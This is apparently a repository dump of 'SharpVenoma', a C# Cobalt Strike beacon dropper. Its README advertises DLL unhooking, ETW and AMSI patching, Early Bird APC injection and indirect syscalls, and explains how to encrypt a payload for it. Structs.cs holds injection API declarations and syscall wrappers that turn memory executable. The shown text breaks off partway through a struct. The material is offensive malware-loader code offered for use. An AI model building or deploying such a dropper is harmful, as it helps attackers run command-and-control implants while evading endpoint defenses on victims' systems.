├── .gitattributes
├── Program.cs
├── README.md
├── SharpVenoma.csproj
├── SharpVenoma.csproj.user
├── SharpVenoma.sln
├── Structs.cs
├── aes.py
└── assets
├── edr1.png
├── edr2.png
├── payload_encode.png
└── payload_update.png
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SharpVenoma
2 |
3 |
4 |
5 |
6 |
7 |
8 | C# reimplementation of Venoma
9 |
10 |
11 |
Another C# Cobalt Strike beacon dropper with custom indirect syscalls execution
12 |
13 |
16 |
17 |
18 |
21 | > A custom CSharp raw beacon dropper with :
22 | > DLL Unhooking (Perun's fart)
23 | > ETW Patching
24 | > AMSI Patching
25 | > EnumPageFilesW execution
26 | > Early Bird APC Execution
27 | > Indirect syscall execution
28 | >
29 |
30 | All functions are included, choose what you need and remove anything else before compiling.
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 | ## Usage
39 |
40 | Generate your raw payload and use the aes.py file to encrypt the data :
41 | 
42 | Update the source code and choose what you want to execute :
43 | 
44 |
45 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/SharpVenoma.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net8.0-windows
6 | enable
7 | enable
8 | SharpVenoma.Program
9 | x64
10 | True
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/SharpVenoma.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | <_LastSelectedProfileId>C:\Users\Utilisateur\source\repos\SharpVenoma\Properties\PublishProfiles\FolderProfile.pubxml
5 |
6 |
--------------------------------------------------------------------------------
/SharpVenoma.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.9.34723.18
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpVenoma", "SharpVenoma.csproj", "{54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {54D1C4C4-4EAC-46A5-9F2B-775436ADB6E1}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {22D8D125-591C-4113-A010-2F550CE4C7C3}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Structs.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Diagnostics;
5 | using System.Linq;
6 | using System.Net.NetworkInformation;
7 | using System.Runtime.InteropServices;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using static SharpVenoma.Structs.Delegates;
11 |
12 | namespace SharpVenoma
13 | {
14 | internal class Structs
15 | {
16 |
17 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
18 | public delegate UInt32 NtProtectVirtualMemoryDelegate(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);
19 |
20 | [DllImport("kernel32.dll")]
21 | public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, ref PROCESS_INFORMATION lpProcessInformation);
22 |
23 | [DllImport("kernel32.dll", EntryPoint = "GetModuleHandleW", SetLastError = true)]
24 | public static extern IntPtr GetModuleHandle(string moduleName);
25 |
26 | [DllImport("kernel32.dll", SetLastError = true)]
27 | public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);
28 |
29 | [DllImport("kernel32.dll", SetLastError = true)]
30 | public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
31 |
32 | [DllImport("kernel32.dll")]
33 | public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
34 |
35 | [DllImport("kernel32.dll")]
36 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref IntPtr lpNumberOfBytesWritten);
37 |
38 | [DllImport("kernel32.dll")]
39 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
40 |
41 | [DllImport("kernel32.dll")]
42 | public static extern bool VirtualProtectEx(IntPtr handle, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
43 |
44 | [DllImport("kernel32.dll")]
45 | public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
46 |
47 | [DllImport("kernel32.dll")]
48 | public static extern uint ResumeThread(IntPtr hThread);
49 |
50 | [DllImport("psapi.dll")]
51 | public static extern bool EnumPageFilesW(IntPtr pCallBackRoutine, IntPtr pContext);
52 |
53 |
54 |
55 |
56 | public struct Delegates
57 | {
58 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
59 | public delegate NTSTATUS NtAllocateVirtualMemory(
60 | IntPtr ProcessHandle,
61 | ref IntPtr BaseAddress,
62 | IntPtr ZeroBits,
63 | ref UIntPtr RegionSize,
64 | ulong AllocationType,
65 | ulong Protect);
66 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
67 | public delegate NTSTATUS NtCreateThreadEx(
68 | out IntPtr hThread,
69 | ACCESS_MASK DesiredAccess,
70 | IntPtr ObjectAttributes,
71 | IntPtr ProcessHandle,
72 | IntPtr lpStartAddress,
73 | IntPtr lpParameter,
74 | bool CreateSuspended,
75 | uint StackZeroBits,
76 | uint SizeOfStackCommit,
77 | uint SizeOfStackReserve,
78 | IntPtr lpBytesBuffer
79 | );
80 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
81 | public delegate NTSTATUS NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout);
82 | }
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 | public static NTSTATUS IndirectNtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, uint AllocationType, uint Protect){
91 | byte[] syscall = Program.IndirectSyscallStub;
92 | unsafe{
93 | fixed (byte* ptr = syscall){
94 | IntPtr memoryAddress = (IntPtr)ptr;
95 | VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, (uint)AllocationProtect.PAGE_EXECUTE_READWRITE, out uint oldprotect);
96 | Delegates.NtAllocateVirtualMemory assembledFunction = (Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtAllocateVirtualMemory));
97 | return (NTSTATUS)assembledFunction(ProcessHandle,ref BaseAddress,ZeroBits,ref RegionSize,AllocationType,Protect);
98 | }
99 | }
100 | }
101 |
102 | public static NTSTATUS IndirectNtCreateThreadEx( out IntPtr hThread, ACCESS_MASK DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer){
103 | byte[] syscall = Program.IndirectSyscallStub;
104 | unsafe{
105 | fixed (byte* ptr = syscall)
106 | {
107 | IntPtr memoryAddress = (IntPtr)ptr;
108 | VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, (uint)AllocationProtect.PAGE_EXECUTE_READWRITE, out uint oldprotect);
109 | Delegates.NtCreateThreadEx assembledFunction = (Delegates.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateThreadEx));
110 | return (NTSTATUS)assembledFunction( out hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
111 | }
112 | }
113 | }
114 |
115 |
116 | public static NTSTATUS IndirectNtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout){
117 | byte[] syscall = Program.IndirectSyscallStub;
118 | unsafe{
119 | fixed (byte* ptr = syscall){
120 | IntPtr memoryAddress = (IntPtr)ptr;
121 | VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, (uint)AllocationProtect.PAGE_EXECUTE_READWRITE, out uint oldprotect);
122 | Delegates.NtWaitForSingleObject assembledFunction = (Delegates.NtWaitForSingleObject)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtWaitForSingleObject));
123 | return (NTSTATUS)assembledFunction(Object, Alertable, Timeout);
124 | }
125 | }
126 | }
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 | [Flags]
135 | public enum ACCESS_MASK : uint
136 | {
137 | DELETE = 0x00010000,
138 | READ_CONTROL = 0x00020000,
139 | WRITE_DAC = 0x00040000,
140 | WRITE_OWNER = 0x00080000,
141 | SYNCHRONIZE = 0x00100000,
142 | STANDARD_RIGHTS_REQUIRED = 0x000F0000,
143 | STANDARD_RIGHTS_READ = 0x00020000,
144 | STANDARD_RIGHTS_WRITE = 0x00020000,
145 | STANDARD_RIGHTS_EXECUTE = 0x00020000,
146 | STANDARD_RIGHTS_ALL = 0x001F0000,
147 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF,
148 | ACCESS_SYSTEM_SECURITY = 0x01000000,
149 | MAXIMUM_ALLOWED = 0x02000000,
150 | GENERIC_READ = 0x80000000,
151 | GENERIC_WRITE = 0x40000000,
152 | GENERIC_EXECUTE = 0x20000000,
153 | GENERIC_ALL = 0x10000000,
154 | DESKTOP_READOBJECTS = 0x00000001,
155 | DESKTOP_CREATEWINDOW = 0x00000002,
156 | DESKTOP_CREATEMENU = 0x00000004,
157 | DESKTOP_HOOKCONTROL = 0x00000008,
158 | DESKTOP_JOURNALRECORD = 0x00000010,
159 | DESKTOP_JOURNALPLAYBACK = 0x00000020,
160 | DESKTOP_ENUMERATE = 0x00000040,
161 | DESKTOP_WRITEOBJECTS = 0x00000080,
162 | DESKTOP_SWITCHDESKTOP = 0x00000100,
163 | WINSTA_ENUMDESKTOPS = 0x00000001,
164 | WINSTA_READATTRIBUTES = 0x00000002,
165 | WINSTA_ACCESSCLIPBOARD = 0x00000004,
166 | WINSTA_CREATEDESKTOP = 0x00000008,
167 | WINSTA_WRITEATTRIBUTES = 0x00000010,
168 | WINSTA_ACCESSGLOBALATOMS = 0x00000020,
169 | WINSTA_EXITWINDOWS = 0x00000040,
170 | WINSTA_ENUMERATE = 0x00000100,
171 | WINSTA_READSCREEN = 0x00000200,
172 | WINSTA_ALL_ACCESS = 0x0000037F
173 | }
174 |
175 | [Flags]
176 | public enum AllocationType : ulong
177 | {
178 | Commit = 0x1000,
179 | Reserve = 0x2000,
180 | Decommit = 0x4000,
181 | Release = 0x8000,
182 | Reset = 0x80000,
183 | Physical = 0x400000,
184 | TopDown = 0x100000,
185 | WriteWatch = 0x200000,
186 | LargePages = 0x20000000
187 | }
188 |
189 | public enum AllocationProtect : uint
190 | {
191 | PAGE_EXECUTE = 0x00000010,
192 | PAGE_EXECUTE_READ = 0x00000020,
193 | PAGE_EXECUTE_READWRITE = 0x00000040,
194 | PAGE_EXECUTE_WRITECOPY = 0x00000080,
195 | PAGE_NOACCESS = 0x00000001,
196 | PAGE_READONLY = 0x00000002,
197 | PAGE_READWRITE = 0x00000004,
198 | PAGE_WRITECOPY = 0x00000008,
199 | PAGE_GUARD = 0x00000100,
200 | PAGE_NOCACHE = 0x00000200,
201 | PAGE_WRITECOMBINE = 0x00000400
202 | }
203 |
204 | public enum NTSTATUS : uint
205 | {
206 | // Success
207 | Success = 0x00000000,
208 | Wait0 = 0x00000000,
209 | Wait1 = 0x00000001,
210 | Wait2 = 0x00000002,
211 | Wait3 = 0x00000003,
212 | Wait63 = 0x0000003f,
213 | Abandoned = 0x00000080,
214 | AbandonedWait0 = 0x00000080,
215 | AbandonedWait1 = 0x00000081,
216 | AbandonedWait2 = 0x00000082,
217 | AbandonedWait3 = 0x00000083,
218 | AbandonedWait63 = 0x000000bf,
219 | UserApc = 0x000000c0,
220 | KernelApc = 0x00000100,
221 | Alerted = 0x00000101,
222 | Timeout = 0x00000102,
223 | Pending = 0x00000103,
224 | Reparse = 0x00000104,
225 | MoreEntries = 0x00000105,
226 | NotAllAssigned = 0x00000106,
227 | SomeNotMapped = 0x00000107,
228 | OpLockBreakInProgress = 0x00000108,
229 | VolumeMounted = 0x00000109,
230 | RxActCommitted = 0x0000010a,
231 | NotifyCleanup = 0x0000010b,
232 | NotifyEnumDir = 0x0000010c,
233 | NoQuotasForAccount = 0x0000010d,
234 | PrimaryTransportConnectFailed = 0x0000010e,
235 | PageFaultTransition = 0x00000110,
236 | PageFaultDemandZero = 0x00000111,
237 | PageFaultCopyOnWrite = 0x00000112,
238 | PageFaultGuardPage = 0x00000113,
239 | PageFaultPagingFile = 0x00000114,
240 | CrashDump = 0x00000116,
241 | ReparseObject = 0x00000118,
242 | NothingToTerminate = 0x00000122,
243 | ProcessNotInJob = 0x00000123,
244 | ProcessInJob = 0x00000124,
245 | ProcessCloned = 0x00000129,
246 | FileLockedWithOnlyReaders = 0x0000012a,
247 | FileLockedWithWriters = 0x0000012b,
248 |
249 | // Informational
250 | Informational = 0x40000000,
251 | ObjectNameExists = 0x40000000,
252 | ThreadWasSuspended = 0x40000001,
253 | WorkingSetLimitRange = 0x40000002,
254 | ImageNotAtBase = 0x40000003,
255 | RegistryRecovered = 0x40000009,
256 |
257 | // Warning
258 | Warning = 0x80000000,
259 | GuardPageViolation = 0x80000001,
260 | DatatypeMisalignment = 0x80000002,
261 | Breakpoint = 0x80000003,
262 | SingleStep = 0x80000004,
263 | BufferOverflow = 0x80000005,
264 | NoMoreFiles = 0x80000006,
265 | HandlesClosed = 0x8000000a,
266 | PartialCopy = 0x8000000d,
267 | DeviceBusy = 0x80000011,
268 | InvalidEaName = 0x80000013,
269 | EaListInconsistent = 0x80000014,
270 | NoMoreEntries = 0x8000001a,
271 | LongJump = 0x80000026,
272 | DllMightBeInsecure = 0x8000002b,
273 |
274 | // Error
275 | Error = 0xc0000000,
276 | Unsuccessful = 0xc0000001,
277 | NotImplemented = 0xc0000002,
278 | InvalidInfoClass = 0xc0000003,
279 | InfoLengthMismatch = 0xc0000004,
280 | AccessViolation = 0xc0000005,
281 | InPageError = 0xc0000006,
282 | PagefileQuota = 0xc0000007,
283 | InvalidHandle = 0xc0000008,
284 | BadInitialStack = 0xc0000009,
285 | BadInitialPc = 0xc000000a,
286 | InvalidCid = 0xc000000b,
287 | TimerNotCanceled = 0xc000000c,
288 | InvalidParameter = 0xc000000d,
289 | NoSuchDevice = 0xc000000e,
290 | NoSuchFile = 0xc000000f,
291 | InvalidDeviceRequest = 0xc0000010,
292 | EndOfFile = 0xc0000011,
293 | WrongVolume = 0xc0000012,
294 | NoMediaInDevice = 0xc0000013,
295 | NoMemory = 0xc0000017,
296 | NotMappedView = 0xc0000019,
297 | UnableToFreeVm = 0xc000001a,
298 | UnableToDeleteSection = 0xc000001b,
299 | IllegalInstruction = 0xc000001d,
300 | AlreadyCommitted = 0xc0000021,
301 | AccessDenied = 0xc0000022,
302 | BufferTooSmall = 0xc0000023,
303 | ObjectTypeMismatch = 0xc0000024,
304 | NonContinuableException = 0xc0000025,
305 | BadStack = 0xc0000028,
306 | NotLocked = 0xc000002a,
307 | NotCommitted = 0xc000002d,
308 | InvalidParameterMix = 0xc0000030,
309 | ObjectNameInvalid = 0xc0000033,
310 | ObjectNameNotFound = 0xc0000034,
311 | ObjectNameCollision = 0xc0000035,
312 | ObjectPathInvalid = 0xc0000039,
313 | ObjectPathNotFound = 0xc000003a,
314 | ObjectPathSyntaxBad = 0xc000003b,
315 | DataOverrun = 0xc000003c,
316 | DataLate = 0xc000003d,
317 | DataError = 0xc000003e,
318 | CrcError = 0xc000003f,
319 | SectionTooBig = 0xc0000040,
320 | PortConnectionRefused = 0xc0000041,
321 | InvalidPortHandle = 0xc0000042,
322 | SharingViolation = 0xc0000043,
323 | QuotaExceeded = 0xc0000044,
324 | InvalidPageProtection = 0xc0000045,
325 | MutantNotOwned = 0xc0000046,
326 | SemaphoreLimitExceeded = 0xc0000047,
327 | PortAlreadySet = 0xc0000048,
328 | SectionNotImage = 0xc0000049,
329 | SuspendCountExceeded = 0xc000004a,
330 | ThreadIsTerminating = 0xc000004b,
331 | BadWorkingSetLimit = 0xc000004c,
332 | IncompatibleFileMap = 0xc000004d,
333 | SectionProtection = 0xc000004e,
334 | EasNotSupported = 0xc000004f,
335 | EaTooLarge = 0xc0000050,
336 | NonExistentEaEntry = 0xc0000051,
337 | NoEasOnFile = 0xc0000052,
338 | EaCorruptError = 0xc0000053,
339 | FileLockConflict = 0xc0000054,
340 | LockNotGranted = 0xc0000055,
341 | DeletePending = 0xc0000056,
342 | CtlFileNotSupported = 0xc0000057,
343 | UnknownRevision = 0xc0000058,
344 | RevisionMismatch = 0xc0000059,
345 | InvalidOwner = 0xc000005a,
346 | InvalidPrimaryGroup = 0xc000005b,
347 | NoImpersonationToken = 0xc000005c,
348 | CantDisableMandatory = 0xc000005d,
349 | NoLogonServers = 0xc000005e,
350 | NoSuchLogonSession = 0xc000005f,
351 | NoSuchPrivilege = 0xc0000060,
352 | PrivilegeNotHeld = 0xc0000061,
353 | InvalidAccountName = 0xc0000062,
354 | UserExists = 0xc0000063,
355 | NoSuchUser = 0xc0000064,
356 | GroupExists = 0xc0000065,
357 | NoSuchGroup = 0xc0000066,
358 | MemberInGroup = 0xc0000067,
359 | MemberNotInGroup = 0xc0000068,
360 | LastAdmin = 0xc0000069,
361 | WrongPassword = 0xc000006a,
362 | IllFormedPassword = 0xc000006b,
363 | PasswordRestriction = 0xc000006c,
364 | LogonFailure = 0xc000006d,
365 | AccountRestriction = 0xc000006e,
366 | InvalidLogonHours = 0xc000006f,
367 | InvalidWorkstation = 0xc0000070,
368 | PasswordExpired = 0xc0000071,
369 | AccountDisabled = 0xc0000072,
370 | NoneMapped = 0xc0000073,
371 | TooManyLuidsRequested = 0xc0000074,
372 | LuidsExhausted = 0xc0000075,
373 | InvalidSubAuthority = 0xc0000076,
374 | InvalidAcl = 0xc0000077,
375 | InvalidSid = 0xc0000078,
376 | InvalidSecurityDescr = 0xc0000079,
377 | ProcedureNotFound = 0xc000007a,
378 | InvalidImageFormat = 0xc000007b,
379 | NoToken = 0xc000007c,
380 | BadInheritanceAcl = 0xc000007d,
381 | RangeNotLocked = 0xc000007e,
382 | DiskFull = 0xc000007f,
383 | ServerDisabled = 0xc0000080,
384 | ServerNotDisabled = 0xc0000081,
385 | TooManyGuidsRequested = 0xc0000082,
386 | GuidsExhausted = 0xc0000083,
387 | InvalidIdAuthority = 0xc0000084,
388 | AgentsExhausted = 0xc0000085,
389 | InvalidVolumeLabel = 0xc0000086,
390 | SectionNotExtended = 0xc0000087,
391 | NotMappedData = 0xc0000088,
392 | ResourceDataNotFound = 0xc0000089,
393 | ResourceTypeNotFound = 0xc000008a,
394 | ResourceNameNotFound = 0xc000008b,
395 | ArrayBoundsExceeded = 0xc000008c,
396 | FloatDenormalOperand = 0xc000008d,
397 | FloatDivideByZero = 0xc000008e,
398 | FloatInexactResult = 0xc000008f,
399 | FloatInvalidOperation = 0xc0000090,
400 | FloatOverflow = 0xc0000091,
401 | FloatStackCheck = 0xc0000092,
402 | FloatUnderflow = 0xc0000093,
403 | IntegerDivideByZero = 0xc0000094,
404 | IntegerOverflow = 0xc0000095,
405 | PrivilegedInstruction = 0xc0000096,
406 | TooManyPagingFiles = 0xc0000097,
407 | FileInvalid = 0xc0000098,
408 | InstanceNotAvailable = 0xc00000ab,
409 | PipeNotAvailable = 0xc00000ac,
410 | InvalidPipeState = 0xc00000ad,
411 | PipeBusy = 0xc00000ae,
412 | IllegalFunction = 0xc00000af,
413 | PipeDisconnected = 0xc00000b0,
414 | PipeClosing = 0xc00000b1,
415 | PipeConnected = 0xc00000b2,
416 | PipeListening = 0xc00000b3,
417 | InvalidReadMode = 0xc00000b4,
418 | IoTimeout = 0xc00000b5,
419 | FileForcedClosed = 0xc00000b6,
420 | ProfilingNotStarted = 0xc00000b7,
421 | ProfilingNotStopped = 0xc00000b8,
422 | NotSameDevice = 0xc00000d4,
423 | FileRenamed = 0xc00000d5,
424 | CantWait = 0xc00000d8,
425 | PipeEmpty = 0xc00000d9,
426 | CantTerminateSelf = 0xc00000db,
427 | InternalError = 0xc00000e5,
428 | InvalidParameter1 = 0xc00000ef,
429 | InvalidParameter2 = 0xc00000f0,
430 | InvalidParameter3 = 0xc00000f1,
431 | InvalidParameter4 = 0xc00000f2,
432 | InvalidParameter5 = 0xc00000f3,
433 | InvalidParameter6 = 0xc00000f4,
434 | InvalidParameter7 = 0xc00000f5,
435 | InvalidParameter8 = 0xc00000f6,
436 | InvalidParameter9 = 0xc00000f7,
437 | InvalidParameter10 = 0xc00000f8,
438 | InvalidParameter11 = 0xc00000f9,
439 | InvalidParameter12 = 0xc00000fa,
440 | MappedFileSizeZero = 0xc000011e,
441 | TooManyOpenedFiles = 0xc000011f,
442 | Cancelled = 0xc0000120,
443 | CannotDelete = 0xc0000121,
444 | InvalidComputerName = 0xc0000122,
445 | FileDeleted = 0xc0000123,
446 | SpecialAccount = 0xc0000124,
447 | SpecialGroup = 0xc0000125,
448 | SpecialUser = 0xc0000126,
449 | MembersPrimaryGroup = 0xc0000127,
450 | FileClosed = 0xc0000128,
451 | TooManyThreads = 0xc0000129,
452 | ThreadNotInProcess = 0xc000012a,
453 | TokenAlreadyInUse = 0xc000012b,
454 | PagefileQuotaExceeded = 0xc000012c,
455 | CommitmentLimit = 0xc000012d,
456 | InvalidImageLeFormat = 0xc000012e,
457 | InvalidImageNotMz = 0xc000012f,
458 | InvalidImageProtect = 0xc0000130,
459 | InvalidImageWin16 = 0xc0000131,
460 | LogonServer = 0xc0000132,
461 | DifferenceAtDc = 0xc0000133,
462 | SynchronizationRequired = 0xc0000134,
463 | DllNotFound = 0xc0000135,
464 | IoPrivilegeFailed = 0xc0000137,
465 | OrdinalNotFound = 0xc0000138,
466 | EntryPointNotFound = 0xc0000139,
467 | ControlCExit = 0xc000013a,
468 | PortNotSet = 0xc0000353,
469 | DebuggerInactive = 0xc0000354,
470 | CallbackBypass = 0xc0000503,
471 | PortClosed = 0xc0000700,
472 | MessageLost = 0xc0000701,
473 | InvalidMessage = 0xc0000702,
474 | RequestCanceled = 0xc0000703,
475 | RecursiveDispatch = 0xc0000704,
476 | LpcReceiveBufferExpected = 0xc0000705,
477 | LpcInvalidConnectionUsage = 0xc0000706,
478 | LpcRequestsNotAllowed = 0xc0000707,
479 | ResourceInUse = 0xc0000708,
480 | ProcessIsProtected = 0xc0000712,
481 | VolumeDirty = 0xc0000806,
482 | FileCheckedOut = 0xc0000901,
483 | CheckOutRequired = 0xc0000902,
484 | BadFileType = 0xc0000903,
485 | FileTooLarge = 0xc0000904,
486 | FormsAuthRequired = 0xc0000905,
487 | VirusInfected = 0xc0000906,
488 | VirusDeleted = 0xc0000907,
489 | TransactionalConflict = 0xc0190001,
490 | InvalidTransaction = 0xc0190002,
491 | TransactionNotActive = 0xc0190003,
492 | TmInitializationFailed = 0xc0190004,
493 | RmNotActive = 0xc0190005,
494 | RmMetadataCorrupt = 0xc0190006,
495 | TransactionNotJoined = 0xc0190007,
496 | DirectoryNotRm = 0xc0190008,
497 | CouldNotResizeLog = 0xc0190009,
498 | TransactionsUnsupportedRemote = 0xc019000a,
499 | LogResizeInvalidSize = 0xc019000b,
500 | RemoteFileVersionMismatch = 0xc019000c,
501 | CrmProtocolAlreadyExists = 0xc019000f,
502 | TransactionPropagationFailed = 0xc0190010,
503 | CrmProtocolNotFound = 0xc0190011,
504 | TransactionSuperiorExists = 0xc0190012,
505 | TransactionRequestNotValid = 0xc0190013,
506 | TransactionNotRequested = 0xc0190014,
507 | TransactionAlreadyAborted = 0xc0190015,
508 | TransactionAlreadyCommitted = 0xc0190016,
509 | TransactionInvalidMarshallBuffer = 0xc0190017,
510 | CurrentTransactionNotValid = 0xc0190018,
511 | LogGrowthFailed = 0xc0190019,
512 | ObjectNoLongerExists = 0xc0190021,
513 | StreamMiniversionNotFound = 0xc0190022,
514 | StreamMiniversionNotValid = 0xc0190023,
515 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
516 | CantOpenMiniversionWithModifyIntent = 0xc0190025,
517 | CantCreateMoreStreamMiniversions = 0xc0190026,
518 | HandleNoLongerValid = 0xc0190028,
519 | NoTxfMetadata = 0xc0190029,
520 | LogCorruptionDetected = 0xc0190030,
521 | CantRecoverWithHandleOpen = 0xc0190031,
522 | RmDisconnected = 0xc0190032,
523 | EnlistmentNotSuperior = 0xc0190033,
524 | RecoveryNotNeeded = 0xc0190034,
525 | RmAlreadyStarted = 0xc0190035,
526 | FileIdentityNotPersistent = 0xc0190036,
527 | CantBreakTransactionalDependency = 0xc0190037,
528 | CantCrossRmBoundary = 0xc0190038,
529 | TxfDirNotEmpty = 0xc0190039,
530 | IndoubtTransactionsExist = 0xc019003a,
531 | TmVolatile = 0xc019003b,
532 | RollbackTimerExpired = 0xc019003c,
533 | TxfAttributeCorrupt = 0xc019003d,
534 | EfsNotAllowedInTransaction = 0xc019003e,
535 | TransactionalOpenNotAllowed = 0xc019003f,
536 | TransactedMappingUnsupportedRemote = 0xc0190040,
537 | TxfMetadataAlreadyPresent = 0xc0190041,
538 | TransactionScopeCallbacksNotSet = 0xc0190042,
539 | TransactionRequiredPromotion = 0xc0190043,
540 | CannotExecuteFileInTransaction = 0xc0190044,
541 | TransactionsNotFrozen = 0xc0190045,
542 | MaximumNtStatus = 0xffffffff
543 | }
544 | public enum AllocationProtectEnum : uint
545 | {
546 | PAGE_EXECUTE = 0x00000010,
547 | PAGE_EXECUTE_READ = 0x00000020,
548 | PAGE_EXECUTE_READWRITE = 0x00000040,
549 | PAGE_EXECUTE_WRITECOPY = 0x00000080,
550 | PAGE_NOACCESS = 0x00000001,
551 | PAGE_READONLY = 0x00000002,
552 | PAGE_READWRITE = 0x00000004,
553 | PAGE_WRITECOPY = 0x00000008,
554 | PAGE_GUARD = 0x00000100,
555 | PAGE_NOCACHE = 0x00000200,
556 | PAGE_WRITECOMBINE = 0x00000400
557 | }
558 |
559 |
560 | [StructLayout(LayoutKind.Sequential)]
561 | public struct IMAGE_DOS_HEADER
562 | {
563 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
564 | public char[] e_magic; // Magic number
565 | public UInt16 e_cblp; // Bytes on last page of file
566 | public UInt16 e_cp; // Pages in file
567 | public UInt16 e_crlc; // Relocations
568 | public UInt16 e_cparhdr; // Size of header in paragraphs
569 | public UInt16 e_minalloc; // Minimum extra paragraphs needed
570 | public UInt16 e_maxalloc; // Maximum extra paragraphs needed
571 | public UInt16 e_ss; // Initial (relative) SS value
572 | public UInt16 e_sp; // Initial SP value
573 | public UInt16 e_csum; // Checksum
574 | public UInt16 e_ip; // Initial IP value
575 | public UInt16 e_cs; // Initial (relative) CS value
576 | public UInt16 e_lfarlc; // File address of relocation table
577 | public UInt16 e_ovno; // Overlay number
578 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
579 | public UInt16[] e_res1; // Reserved words
580 | public UInt16 e_oemid; // OEM identifier (for e_oeminfo)
581 | public UInt16 e_oeminfo; // OEM information; e_oemid specific
582 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
583 | public UInt16[] e_res2; // Reserved words
584 | public Int32 e_lfanew; // File address of new exe header
585 | private string _e_magic
586 | {
587 | get { return new string(e_magic); }
588 | }
589 | public bool isValid
590 | {
591 | get { return _e_magic == "MZ"; }
592 | }
593 | }
594 |
595 |
596 |
597 | [StructLayout(LayoutKind.Sequential)]
598 | public struct IMAGE_FILE_HEADER{
599 | public UInt16 Machine;
600 | public UInt16 NumberOfSections;
601 | public UInt32 TimeDateStamp;
602 | public UInt32 PointerToSymbolTable;
603 | public UInt32 NumberOfSymbols;
604 | public UInt16 SizeOfOptionalHeader;
605 | public UInt16 Characteristics;
606 | }
607 |
608 |
609 | [StructLayout(LayoutKind.Sequential)]
610 | public struct IMAGE_DATA_DIRECTORY{
611 | public UInt32 VirtualAddress;
612 | public UInt32 Size;
613 | }
614 |
615 |
616 | [StructLayout(LayoutKind.Explicit)]
617 | public struct IMAGE_OPTIONAL_HEADER64
618 | {
619 | [FieldOffset(0)]
620 | public ushort Magic;
621 |
622 | [FieldOffset(2)]
